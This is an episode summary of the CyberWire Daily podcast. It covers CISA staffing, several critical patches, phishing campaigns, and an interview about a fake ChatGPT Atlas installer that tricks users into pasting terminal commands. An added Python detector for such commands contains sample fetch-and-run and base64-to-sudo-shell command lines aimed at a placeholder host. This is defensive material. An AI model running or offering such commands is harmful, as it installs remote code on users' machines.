CyberWire Daily — "Stabilized but Smaller"
Date: January 22, 2026
Host: Dave Bittner (N2K Networks)
Guest Interview: Kaushik Deveretti, AI Data Scientist, Fable Security
Episode Overview
This episode covers the stabilization of the US Cybersecurity and Infrastructure Security Agency (CISA) after a turbulent year, major software vulnerabilities and threat campaigns in the wild, new phishing and social engineering trends, notable arrests for cyber-enabled crimes, and heightened concerns about AI and quantum risk at the World Economic Forum in Davos. The featured interview dives into a new flavor of “click-fix” malware attacks using fake AI browser installers.
Key News and Analysis Segments
1. CISA Organizational Update & Congressional Hearings
[01:20 - 03:55]
- CISA’s Acting Director Madhu Gadamukkala told the House Homeland Security Committee the agency has stabilized after 2025’s staff cuts, funding disruptions, and internal restructuring.
- CISA staff shrank to 2,400, down 1,000 from the start of the Trump administration.
- Quote: “[CISA] does not expect further organizational changes in fiscal year 2026 ... [and] now has the workforce it needs.” — Gadamukkala [02:30]
- Republicans praised a more focused operational scope, while Democrats warned further budget cuts threaten civilian cyber defense.
- Looming DHS funding showdown anticipated.
2. Major Vulnerabilities & Exploits in the Wild
[03:56 - 07:10]
- Google Chrome / Chromium Browsers:
- Emergency update fixes a critical V8 JavaScript engine “race condition” allowing sandbox escapes and code execution (patch released Jan 20, 2026).
- Advice: Users urged to update immediately.
- Cisco Enterprise Communications:
- Emergency patches for unauthenticated code injection in web-based management interfaces. No workarounds available; patching is mandatory.
- Products affected: Unified Communications Manager, Unity Connection, WebEx Calling Dedicated Instance.
- Fortinet FortiGate Firewalls:
- Ongoing automated attacks exploit what may be a previously unknown vulnerability in FortiGate’s FortiCloud SSO feature, creating rogue accounts and exporting firewall configs.
- Quote: “Arctic Wolf says it remains unclear whether current attacks are fully addressed by existing patches ... Fortinet is expected to release additional updates.” [06:04]
- Exposure: Nearly 11,000 devices online at risk per Shadowserver.
- Advice: Disable FortiCloud SSO as interim mitigation.
3. Social Engineering Campaigns and Attacker Trends
[07:11 - 09:22]
- Zendesk Relay Spam:
- Attackers exploit unsecured Zendesk support settings to turn ticketing systems into spam engines, flooding inboxes with hundreds of bogus emails.
- The mail bypasses spam filters because it is relayed through trusted brands’ own support systems (Discord, Dropbox and Riot Games among those affected).
- Zendesk is rolling out fixes and recommends restricting ticketing to verified users.
- LastPass Phishing Wave:
- Ongoing campaign sending fake LastPass notifications demanding urgent password vault backups, directing to credential-stealing sites.
- Advice: LastPass never asks for the master password; users must avoid urgency-fueled prompts.
- Quote: “A compromised master password could expose many additional accounts.” [09:00]
4. Arrest in Greek Cell Tower Scam
[09:23 - 10:39]
- Greek police arrested two foreign nationals suspected of running an “SMS blaster” that impersonated mobile telecom towers using a mobile computer and concealed antenna.
- Tactics: Forced phones from 4G to insecure 2G, collected identities, used data for smishing (fraudulent SMS phishing).
5. Davos Developments: AI and Quantum Risk
[10:40 - 12:30]
- AI Security Concerns:
- EY’s Raj Sharma: Criticizes immaturity of AI agent security frameworks—agents can access critical data with poor identity controls.
- KPMG’s Tim Walsh: AI-related cyber risk is a top CEO concern and is slowing some AI adoption; flags quantum computing as a looming encryption threat.
- Quote: “Quantum computing ... could break current encryption and force widespread reengineering.” —Tim Walsh [11:34]
6. Pwn2Own Automotive 2026: Hacking Cars for Cash
[12:31 - 13:57]
- Day 2 saw $439,000+ in prizes for successful car and charger hacks—total for two days over $955,000.
- Targets: EV chargers, car infotainment systems, automotive-grade Linux.
- Teams: Fuzzware IO led with $213,000; Tesla tech featured.
- Vendors now have 90 days to patch bugs found at the event.
Featured Interview: Kaushik Deveretti on Fake ChatGPT Browser Installer
[14:44 - 21:43]
Background
Kaushik Deveretti, AI Data Scientist at Fable Security, describes exploring a new “AI browser” tool (ChatGPT Atlas) and running into a cleverly disguised malware campaign via Google Ads.
Key Discussion Points
- Discovery of the Attack
- On searching for “ChatGPT Atlas,” Deveretti noticed the top (sponsored) Google ad was a fake but visually identical website, hosted on Google Sites.
- Quote: “There was really no way to tell that this was a malicious website other than the domain itself not being chatgpts.” — Deveretti [15:54]
- Attack Mechanics: “ClickFix” Twist
- Clicking “download” did not deliver a file; instead it showed instructions to run a terminal command on the user’s machine. The command was base64-encoded and, once decoded and run, fetched a remote script (the malware).
- Novelty: Traditional “clickfix” attacks mimic troubleshooting/fixes, but this one presented as a legitimate installer workflow.
- Quote: “The deception strategy and the entry point was very different from a traditional clickfix attack.” — Deveretti [16:54]
- Execution and Analysis
- The download process required the user’s system password to proceed, suggesting elevated privileges were needed for malware persistence.
- Uploading the script to VirusTotal returned no matches, and the EDR solution did not flag it as malicious.
- Quote: “The EDR did not pick up that it was a malicious file.” — Deveretti [19:23]
- Defense and Takeaways
- Awareness: Don’t run commands from untrusted sources, especially via copy-paste in terminal.
- Technical Controls: Restrict terminal/root access for non-developer users where possible.
- Layered Approach: Technical safeguards are important, but awareness and education are vital for users with legitimate need for elevated access (e.g., developers).
- Quote: “I think at a very basic level we should be educating people that they should not be running arbitrary commands on their computer.” — Deveretti [20:27]
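The installer flow described above (a base64-encoded terminal command that, once decoded, fetches a remote script and runs with the user’s password) and the “restrict terminal access” takeaway both point at the same detection opportunity: audit shell command lines for decode-to-shell and fetch-to-shell pipelines. The following is an added example, not code from the episode, Fable Security or any product named here; the command lines and the example.invalid host are constructed.

```python
import base64
import re
# Constructed sample data (not from the episode); example.invalid is a placeholder host.
CONSTRUCTED_PAYLOAD = "curl -fsSL https://example.invalid/install.sh | sh"
ENCODED = base64.b64encode(CONSTRUCTED_PAYLOAD.encode()).decode()
SAMPLE_COMMANDS = [
    f"echo {ENCODED} | base64 -d | sudo sh",               # fake-installer "step"
    "git clone https://github.com/example/repo.git",      # benign developer use
    "curl -fsSL https://example.invalid/setup.sh | bash",  # fetch-and-run
]
B64_TOKEN = re.compile(r"^[A-Za-z0-9+/]{20,}={0,2}$")
INTERPRETERS = {"sh", "bash", "zsh", "osascript", "python", "python3"}
FETCH_TOOLS = {"curl", "wget"}

def pipeline_programs(cmd, indicators):
    """Program name of each pipeline stage (split on single '|'; quoting not handled); notes sudo."""
    programs = []
    for part in re.split(r"(?<!\|)\|(?!\|)", cmd):
        argv = part.split()
        if argv and argv[0] == "sudo":
            indicators.add("privilege_escalation")
            argv = argv[1:]
        if argv:
            programs.append(argv[0].rsplit("/", 1)[-1])   # strip any path prefix
    return programs

def decoded_payloads(cmd):
    """Statically decode base64-looking tokens that yield valid UTF-8 text."""
    out = []
    for tok in cmd.split():
        if B64_TOKEN.match(tok):
            try:
                out.append(base64.b64decode(tok, validate=True).decode("utf-8"))
            except (ValueError, UnicodeDecodeError):   # e.g. hex hashes decode to junk
                pass
    return out

def assess_command(cmd):
    """Flag base64-to-shell and fetch-to-shell pipelines in a command and its decoded blobs."""
    indicators = set()
    payloads = decoded_payloads(cmd)
    for text in [cmd, *payloads]:
        programs = pipeline_programs(text, indicators)
        for prev, curr in zip(programs, programs[1:]):
            if curr in INTERPRETERS and prev == "base64":
                indicators.add("base64_decode_to_shell")
            if curr in INTERPRETERS and prev in FETCH_TOOLS:
                indicators.add("remote_fetch_to_shell")
    risk = "high" if indicators & {"base64_decode_to_shell", "remote_fetch_to_shell"} else "low"
    return {"command": cmd, "risk": risk, "indicators": sorted(indicators), "decoded": payloads}
```

Run the checker over exported shell history or endpoint command-line telemetry; the decoded payload is returned so an analyst can see what the blob would have executed without running it.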
Notable Q&A
- Host (Dave Bittner):
- “As a Mac user…for someone to ask you to invoke the terminal and enter a command—that rarely happens. So that was a red flag for you.” [19:35]
- Deveretti: “Correct. ...You should never run an arbitrary shell command on your computer...unless you're absolutely sure you know what it's doing.” [19:53]
Additional Security Insights
Common Passwords Remain Unchanged
[24:30 - 25:45]
- Analysis of 6 billion leaked credentials: most common passwords are still “123456,” “password,” and “admin” (both personal and enterprise systems).
- Numeric strings and trivial passwords remain prevalent, creating easy targets for attackers.
- “Attackers innovate, users reuse, and security teams clean up the mess.” [25:44]
Memorable Quotes & Moments
- On CISA’s approach:
- “We now have the workforce we need and plan targeted initiatives in 2026 to address the most critical cyber risk gaps.” — Madhu Gadamukkala [02:34]
- On the click-fix malware evolution:
- “While clickfix attacks are well known, the deception strategy and the entry point was very different from a traditional clickfix attack.” — Kaushik Deveretti [16:54]
- On end-user best practice:
- “Never run an arbitrary shell command on your computer unless…you’re absolutely sure you know what it’s doing.” — Kaushik Deveretti [19:53]
- On persistent password problems:
- “Attackers innovate, users reuse, and security teams clean up the mess.” [25:44]
Timestamps for Key Segments
- CISA Stabilization & Congressional Testimony: 01:20 – 03:55
- Major Vulnerability and Patch Alerts: 03:56 – 07:10
- Social Engineering / Spam & Phishing Campaigns: 07:11 – 09:22
- Greek Cell Tower Scam Arrests: 09:23 – 10:39
- AI and Quantum Risk at Davos: 10:40 – 12:30
- Pwn2Own Automotive Bug Bounties: 12:31 – 13:57
- Featured Interview – Malware in Fake AI Installers: 14:44 – 21:43
- Password Trends Analysis: 24:30 – 25:45
Closing Takeaways
- Enterprise and personal cyber hygiene continue to be challenged by attacker innovation and end-user habits.
- Fake installers and lookalike websites are rapidly evolving and now leverage search ads and AI hype.
- Continuous education—not just technical controls—remains critical for risk mitigation, especially as attackers pivot to new lures and vectors.
- AI’s intersection with cyber risk is now a front-and-center boardroom priority, with quantum computing on the horizon as a potential encryption game-changer.
For links to all referenced stories, visit TheCyberWire.com.
